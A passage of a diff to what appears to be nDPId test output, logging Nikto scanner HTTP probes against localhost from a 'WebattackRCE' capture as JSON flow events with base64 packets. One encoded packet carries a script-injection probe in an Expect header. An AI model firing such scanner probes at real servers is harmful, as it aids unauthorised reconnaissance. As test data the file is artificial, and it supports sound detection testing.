00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1576420276825,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276825,"pkt":"AAAAAAAAAAAAAAAACABFAADIFrxAAEAGJXJ\/AAABfwAAAcJYH5C2Ei6NIzroBYAYAED+vAAAAQEICp1m+4GdZvuBR0VUIC9kZWZhdWx0Lmh0bSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276825,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276825,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1576420276827,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276827,"pkt":"AAAAAAAAAAAAAAAACABFAADFTUVAAEAG7ut\/AAABfwAAAcJaH5CLBXV23SQCI4AYAED+uQAAAQEICp1m+4OdZvuDR0VUIC9pbmRleC5kbyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.do","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.do","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1576420276828,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276828,"pkt":"AAAAAAAAAAAAAAAACABFAADICi9AAEAGMf9\/AAABfwAAAcJcH5By6zIbQafp54AYAED+vAAAAQEICp1m+4SdZvuER0VUIC9pbmRleC5qaHRtbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jhtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jhtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1576420276829,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276829,"pkt":"AAAAAAAAAAAAAAAACABFAADG08RAAEAGaGt\/AAABfwAAAcJeH5AOKuv2Y8ch84AYAED+ugAAAQEICp1m+4WdZvuFR0VUIC9pbmRleC5qc3AgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jsp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jsp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1576420276832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276832,"pkt":"AAAAAAAAAAAAAAAACABFAADGiDJAAEAGs\/1\/AAABfwAAAcJgH5Cj8LAJpHctpoAYAED+ugAAAQEICp1m+4edZvuHR0VUIC9pbmRleC54bWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7580000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420276834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1576420276834,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":240,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":240,"pkt_l4_len":206,"thread_ts_msec":1576420276834,"pkt":"AAAAAAAAAAAAAAAACABFAADiGX1AAEAGIpd\/AAABfwAAAcJkH5BjVCFE0UHCd4AYAED+1gAAAQEICp1m+4qdZvuKR0VUIC9pbmRleCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om5lZ290aWF0ZSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdDogYXBwbGljYXRpb24vd2hhdGV2ZXI7IHE9MS4wDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7580000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420276834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:negotiate)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7580000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420276834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:negotiate)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276835,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1576420276835,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420276835,"pkt":"AAAAAAAAAAAAAAAACABFAADKANNAAEAGO1l\/AAABfwAAAcJmH5BoODjpUSa4iYAYAED+vgAAAQEICp1m+4udZvuLR0VUIC9+YmluIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDphcGFjaGV1c2Vyczoga25vd24gdXNlcikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276835,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/~bin","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apacheusers: known user)"}} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276835,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/~bin","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apacheusers: known user)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420276837,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00713{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1576420276837,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420276837,"pkt":"AAAAAAAAAAAAAAAACABFAADlgjNAAEAGud1\/AAABfwAAAcJoH5AFkroJ2Lkky4AYAED+2QAAAQEICp1m+42dZvuNR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KRXhwZWN0OiA8c2NyaXB0PmFsZXJ0KHhzcyk8L3NjcmlwdD4NClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDphcGFjaGVfZXhwZWN0X3hzcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420276837,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apache_expect_xss)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420276837,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 